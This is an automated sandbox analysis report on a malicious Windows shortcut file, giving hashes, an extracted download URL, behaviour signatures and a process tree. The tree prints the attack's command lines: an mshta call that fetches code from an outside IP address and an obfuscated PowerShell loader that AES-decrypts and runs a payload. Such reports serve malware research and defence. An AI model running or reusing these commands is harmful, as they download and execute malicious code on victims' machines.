Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted: 16/03/2024, 02:25
Static task: static1
Behavioral task: behavioral1
  Sample: 6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: 6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
  Resource: win10v2004-20240226-en
General
Target: 6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
Size: 1KB
MD5: 90a6eed71981efdcdbc0c8c0151cfb0e
SHA1: c21e13a29ad18e73b88eddec919b85925a95952a
SHA256: 6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd
SHA512: fa7b96a7e404dc187d43f04ccd55637a959fbb7950d6b69e80539b4026cfd62460a74330dadb2a8e1578ddf0b87f31a4c8bac6451bd57130aa90f5a5bce77bbd
Malware Config
Extracted: http://89.23.98.210/qqeng
Signatures
Blocklisted process makes network request (5 IoCs)
  flow  pid   Process
  3     2448  mshta.exe
  6     2752  powershell.exe
  7     2752  powershell.exe
  8     2752  powershell.exe
  9     2752  powershell.exe
Downloads MZ/PE file
Drops file in Windows directory (2 IoCs)
  - File opened for modification: C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
  - File opened for modification: C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Modifies Internet Explorer settings
  - Key created: \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2792  powershell.exe
  2752  powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2792  powershell.exe
  Token: SeDebugPrivilege  2752  powershell.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  description                       pid   Process         procid_target
  PID 2980 wrote to memory of 2552  2980  cmd.exe         29
  PID 2980 wrote to memory of 2552  2980  cmd.exe         29
  PID 2980 wrote to memory of 2552  2980  cmd.exe         29
  PID 2552 wrote to memory of 2792  2552  forfiles.exe    30
  PID 2552 wrote to memory of 2792  2552  forfiles.exe    30
  PID 2552 wrote to memory of 2792  2552  forfiles.exe    30
  PID 2792 wrote to memory of 2448  2792  powershell.exe  31
  PID 2792 wrote to memory of 2448  2792  powershell.exe  31
  PID 2792 wrote to memory of 2448  2792  powershell.exe  31
  PID 2448 wrote to memory of 2752  2448  mshta.exe       32
  PID 2448 wrote to memory of 2752  2448  mshta.exe       32
  PID 2448 wrote to memory of 2752  2448  mshta.exe       32
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
   - Suspicious use of WriteProcessMemory
   PID: 2980
   2. C:\Windows\System32\forfiles.exe
      Command line: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://89.23.98.210/qqeng
      - Suspicious use of WriteProcessMemory
      PID: 2552
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: start mshta http://89.23.98.210/qqeng
         - Drops file in Windows directory
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         PID: 2792
         4. C:\Windows\system32\mshta.exe
            Command line: "C:\Windows\system32\mshta.exe" http://89.23.98.210/qqeng
            - Blocklisted process makes network request
            - Modifies Internet Explorer settings
            - Suspicious use of WriteProcessMemory
            PID: 2448
            5. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function vTMsUbI($pvPiSaK){return -split ($pvPiSaK -replace '..', '0x$& ')};$DDZuEbM = vTMsUbI('[hex-encoded encrypted payload omitted]');$bftik = [System.Security.Cryptography.Aes]::Create();$bftik.Key = vTMsUbI('55676E624475754F69737A6879546E70');$bftik.IV = New-Object byte[] 16;$lJcHtpBA = $bftik.CreateDecryptor();$UZsjRnWNL = $lJcHtpBA.TransformFinalBlock($DDZuEbM, 0, $DDZuEbM.Length);$UVWwHyrcG = [System.Text.Encoding]::Utf8.GetString($UZsjRnWNL);$lJcHtpBA.Dispose();& $UVWwHyrcG.Substring(0,3) $UVWwHyrcG.Substring(3)
               - Blocklisted process makes network request
               - Drops file in Windows directory
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of AdjustPrivilegeToken
               PID: 2752
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 2877d5092f7f51adfea48540a189ff30
  SHA1: 5d27075ccc2aab431c8733df6384090898a06a82
  SHA256: 499fd9bc92a9688afdf07a00fe652e50a5c590ca9e533f0b7f5da9991624fd3f
  SHA512: 63c93e4aabb39b260aa071eac74ff07f0e1687628eb880734bc5c17f6aa46e3aed6b0b4cc8cd3420093c20e48f65a778ff4f309fc9f4cba8a8a0590417aea56b